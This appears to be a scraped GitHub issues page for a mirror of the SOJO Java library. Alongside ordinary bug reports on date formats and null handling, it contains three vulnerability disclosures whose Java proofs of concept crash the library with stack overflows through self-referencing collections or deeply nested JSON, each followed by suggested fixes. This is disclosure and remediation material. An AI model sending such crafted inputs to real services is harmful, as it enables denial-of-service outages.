Copied from http://sojo.sourceforge.net/
Home Page: http://sojo.sourceforge.net/
License: Apache License 2.0
Available on Maven Central:
This repository was copied from revision 257 of the SOJO subversion repository trunk at https://sourceforge.net/p/sojo/code/257/tree/trunk/
Documentation can be found on the original project site at https://sojo.sourceforge.net
Sojo is now available in the Maven Central repository
<dependency>
<groupId>net.sf.sojo</groupId>
<artifactId>sojo</groupId>
<version>1.0.13</groupId>
</dependency>
For Parameters with ex:nil value is replace with the next available key value.
XmlRpcContentHandler.java
else if (lvCurrentStackObj instanceof Map) {
Map<Object, Object> lvMap = (Map<Object, Object>) lvCurrentStackObj;
lvMap.put(pvName, pvValue);
if ("key".equals(pvName)) {
for (Map.Entry<?, Object> lvEntry : lvMap.entrySet()) {
if (lvEntry.getValue() == null) {
lvEntry.setValue(pvValue); ---> this replaces the null value to the next available value.
}
}
}
lvMap.remove("key");
sojo before v1.1.1 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.
Exception in thread "main" java.lang.StackOverflowError
at net.sf.sojo.interchange.json.JsonWalkerInterceptor.handleControlCharacter(JsonWalkerInterceptor.java:114)
at net.sf.sojo.interchange.json.JsonWalkerInterceptor.handleJsonValue(JsonWalkerInterceptor.java:181)
at net.sf.sojo.interchange.json.JsonWalkerInterceptor.visitElement(JsonWalkerInterceptor.java:214)
at net.sf.sojo.common.ObjectGraphWalker.fireVisitElementEvent(ObjectGraphWalker.java:80)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:139)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
<dependency>
<groupId>net.sf.sojo</groupId>
<artifactId>sojo</artifactId>
<version>1.1.1</version>
</dependency>import net.sf.sojo.interchange.json.JsonSerializer;
import java.util.HashMap;
public class PoC2 {
public static void main(String[] args) {
HashMap<String,Object> map=new HashMap<>();
map.put("t",map);
JsonSerializer jsonSerializer = new JsonSerializer();
jsonSerializer.serialize(map);
}
}Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))
I think it would be good to replace all references to Vector (which is deprecated) with List (or ArrayList).
Hi Martin,
I've tried to compile SOJO and I'm getting date-time formatting exceptions all over the show. For example, one such case is as follows:
testString2Date(test.net.sf.sojo.util.UtilTest) Time elapsed: 0.007 sec <<< ERROR!
java.lang.IllegalStateException: The String: "Mon Dec 19 14:18:03 SAST 2011" is not valid date.
at net.sf.sojo.util.Util.string2Date(Util.java:178)
at test.net.sf.sojo.util.UtilTest.testString2Date(UtilTest.java:35)
I suspect it is because the Util class (in net.sf.sojo.util) specifically adds the following formats in a static initializer block:
static {
addDateFormat2List(new SimpleDateFormat("EEE MMM dd HH:mm:ss 'CEST' yyyy", Locale.ENGLISH));
addDateFormat2List(new SimpleDateFormat("EEE MMM dd HH:mm:ss 'CET' yyyy", Locale.ENGLISH));
addDateFormat2List(new SimpleDateFormat("yyyy-MM-dd"));
addDateFormat2List(DateFormat.getDateInstance(DateFormat.MEDIUM));
}
which will only cater for CEST and CET dates. This will obviously cause an issue for people in other time zones. I will try to see if this can be fixed.
Regards,
Wiehann
sojo before v1.1.1 was discovered to contain a stack overflow via the List parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.
Exception in thread "main" java.lang.StackOverflowError
at net.sf.sojo.common.ObjectGraphWalker.fireVisitIterateableElement(ObjectGraphWalker.java:89)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:175)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
<dependency>
<groupId>net.sf.sojo</groupId>
<artifactId>sojo</artifactId>
<version>1.1.1</version>
</dependency>import net.sf.sojo.interchange.json.JsonSerializer;
import java.util.ArrayList;
public class PoC3 {
public static void main(String[] args) {
ArrayList<Object> list = new ArrayList<>();
list.add(list);
JsonSerializer jsonSerializer = new JsonSerializer();
jsonSerializer.serialize(list);
}
}Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))
Some tests fail in Java 7.
There is a lot of good documentation and some documentation is missing. All of it should be put in the maven site.
Using sojo to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.
Exception in thread "main" java.lang.StackOverflowError
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_scan_token(JsonParserGenerate.java:503)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_4(JsonParserGenerate.java:344)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_3(JsonParserGenerate.java:374)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_3(JsonParserGenerate.java:351)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_13(JsonParserGenerate.java:295)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_6(JsonParserGenerate.java:313)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_6(JsonParserGenerate.java:258)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_3(JsonParserGenerate.java:357)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_13(JsonParserGenerate.java:295)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_2_13(JsonParserGenerate.java:252)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:144)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
<dependency>
<groupId>net.sf.sojo</groupId>
<artifactId>sojo</artifactId>
<version>1.1.1</version>
</dependency>import net.sf.sojo.interchange.json.JsonParser;
public class PoC {
public final static int TOO_DEEP_NESTING = 9999;
public final static String TOO_DEEP_DOC = _nestedDoc(TOO_DEEP_NESTING, "[ ", "] ", "0");
public static String _nestedDoc(int nesting, String open, String close, String content) {
StringBuilder sb = new StringBuilder(nesting * (open.length() + close.length()));
for (int i = 0; i < nesting; ++i) {
sb.append(open);
if ((i & 31) == 0) {
sb.append("\n");
}
}
sb.append("\n").append(content).append("\n");
for (int i = 0; i < nesting; ++i) {
sb.append(close);
if ((i & 31) == 0) {
sb.append("\n");
}
}
return sb.toString();
}
public static void main(String[] args) {
String jsonString = TOO_DEEP_DOC;
JsonParser parser = new JsonParser();
parser.parse(jsonString);
}
}Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.